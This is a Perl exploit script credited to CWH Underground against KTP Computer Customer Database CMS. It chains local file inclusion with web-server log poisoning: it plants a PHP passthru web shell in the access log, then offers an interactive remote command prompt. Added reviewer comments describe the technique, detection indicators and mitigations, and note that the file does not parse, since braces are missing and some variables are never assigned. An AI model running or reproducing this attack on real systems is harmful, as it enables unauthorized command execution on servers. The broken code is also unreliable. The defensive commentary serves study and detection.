#!/usr/bin/perl -w
# KTPCCD Local File Inclusion Exploit
#AUTHOR : CWH Underground
#DATE : 30 November 2008
#SITE : cwh.citec.us
#APPLICATION : KTP Computer Customer Database CMS
#DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip
#Note: magic_quotes_gpc = off
#Vulnerability : Local File Inclusion
#Exploit chains Local File Inclusion into Remote Command Execution
#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK

use LWP::UserAgent;
use IO::Socket;
use LWP::Simple;

# Defender's reading of this script: it is a two-stage chain against the
# "p" include parameter of the target application. Stage 1 (below the
# "Trying to Inject the Code" banner) plants a PHP tag in the web server's
# access log through a crafted request line; stage 2 requests that log
# through the include parameter so the planted tag is executed
# (log poisoning combined with LFI).
# Things a maintainer should know before reading on:
#   - $host and $path are read below but are never assigned from @ARGV in
#     the visible lines, and @apache (the candidate log list) is not
#     declared here; both may live in a part of the file not shown.
#   - Several statements (the if and foreach bodies) are not
#     brace-delimited, so as written this file does not parse.
# NOTE(review): stray list element with a trailing comma, not assigned to
# anything in view; it looks like the same kind of log-file path the loop
# below iterates over, but that cannot be confirmed from here.
"../../.. /../../var/www/logs/access_log",

# Clear the terminal; the Windows/Unix split is only cosmetic.
my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }

print "     KTP Computer Customer Database \n";
print "    Remote Command Execution Exploit \n";
print "      Discovered By CWH Underground \n";
# Usage check: no braces and no exit after the usage text, so even with
# fewer than two arguments execution would continue past this point.
if (@ARGV < 2)
    print "Usage: ./xpl.pl <Host> <Path>\n";
	print "Ex. ./xpl.pl www.hackme.com /ktp\n";



# Strip a leading "http://" so $host is a bare hostname for the raw socket.
if ( $host   =~   /^http:/ ) {$host =~ s/http:\/\///g;}

print "\nTrying to Inject the Code...\n";

# Stage 1, log poisoning: the request target itself carries a PHP tag. The
# intent is that the web server records the request line in its access
# log, which the LFI stage then reads back. Nothing here reads the
# response or confirms the line was logged; the only check is the
# "cwhunderground" marker looked up in the loop below.
# Detection: request lines containing "<?" or "passthru(" in web access
# logs are a direct indicator of this technique. Mitigation on the
# application side is to never pass user-controlled values to include, or
# to validate "p" against an allow-list of known page names.
$CODE="<? passthru(\$_GET[cmd]) ?>";
# Hard-coded port 80; no TLS, no timeout.
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";
# The space inside the request target makes this a malformed HTTP/1.1
# request line; how a given server records it cannot be confirmed here.
print $socket "GET /cwhunderground ".$CODE." HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";

# Re-add the scheme: from here on $host is used as a URL base for LWP.
if ( $host   !~   /^http:/ ) {$host = "http://" . $host;}

# Stage 2, locate the poisoned log through the include parameter. Each
# candidate in @apache is requested as "?p=<candidate>%00"; the trailing
# NUL is meant to cut off whatever the application appends to the value
# (a suffix is implied by the header's magic_quotes_gpc note, not shown
# here). Modern PHP refuses NUL bytes in include paths, which closes this
# particular trick but not the underlying LFI.
# The loop body has no braces; the assignments below are what it intends.
 foreach $getlog(@apache)
				  $find= $host.$path."/?p=".$getlog."%00";
                  # A fresh UserAgent per request; no timeout is set.
                  $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
				  $req = HTTP::Request->new(GET => $find);
				  $res = $xpl->request($req);
				  $info = $res->content;
                  # Success marker is the path planted in stage 1. $log keeps the
                  # last matching candidate and stays undef if none matched; the
                  # command loop further down does not check for that.
                  if($info =~ /cwhunderground/)
                    {print "\nSuccessfully injected in $getlog \n";$log=$getlog;}

# Interactive prompt. $sis is declared a second time at the same scope;
# under -w this is reported as masking the earlier declaration.
my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; }

# First command; the loop that sends it follows this block.
chomp( $cmd = <STDIN> );

while($cmd !~ "exit") {   
				  $shell= $host.$path."/?p=".$log."%00&cmd=$cmd";
                  $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
				  $req = HTTP::Request->new(GET => $shell);
				  $res = $xpl->request($req);
				  $info = $res->content;
				  print "\n$info";

    my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; }
    chomp( $cmd = <STDIN> );   